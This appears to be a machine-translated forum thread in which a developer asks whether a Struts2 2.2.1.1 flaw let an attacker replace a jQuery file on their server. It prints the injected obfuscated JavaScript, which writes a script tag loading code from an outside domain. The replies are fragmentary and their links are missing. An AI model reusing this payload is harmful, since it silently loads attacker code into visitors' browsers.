Struts2 struts 2错误获取对服务器的根访问权限

我已经研究了很长一段时间（研究不限于此网站），但我没有看到任何关于这个“所谓”问题的讨论

我的朋友告诉我，他们在使用Struts2（2.2.1.1）时发现了一个关键问题。告诉我黑客可以获得项目目录的根访问权限。因此，他可以修改项目中的文件

我以前很少注意它。但刚才我也遇到了同样的问题

[所谓的Bug]：一直在想，为什么在我部署了我的项目之后，所有使用javascript触发事件的DOM元素在一段时间后都不能工作。进一步调查，我发现我上传到服务器的jquery库（使用jquery-1.3.2.min.js）已经被替换（其内容）。文件名相同，但内容无法识别（至少对我而言），请参见以下内容：

var _0xfcda=["\x3C\x53\x43\x52\x49\x50\x54\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x67\x6F\x6F\x67\x6C\x65\x61\x64\x73\x6C\x2E\x63\x6F\x6D\x2F\x73\x70\x63\x6F\x64\x65\x2F\x63\x70\x2E\x6A\x73\x22\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E","\x77\x72\x69\x74\x65"];document[_0xfcda[1]](_0xfcda[0]);

这时我想起了我朋友告诉我的话。是否有人能确认所述错误/问题是否合法，并在此处解释其全部内容以及如何修复。我认为这是一个相当大的故障

注意：我很确定上面的代码不是我们的。我检查了我的本地副本，代码不同，我的本地版本一切正常。当然，除了我之外，没有人知道服务器的根密码

注意：我将使用最新的struts 2版本，但我认为这个问题，如果合法的话，需要作为社区的参考进行彻底讨论

我的朋友告诉我，他们在使用Struts2时发现了一个关键问题 (2.2.1.1). 告诉我黑客可以获得你的根访问权限 项目的目录。因此，他可以修改项目中的文件

我想他指的是一个被发现并被发现的漏洞

您可以在中阅读详细信息

---

Struts+1中的任意文件覆盖，直到发现下一个漏洞。：）也许最好放上“最新稳定版本”，“无法识别”是十六进制<代码>，即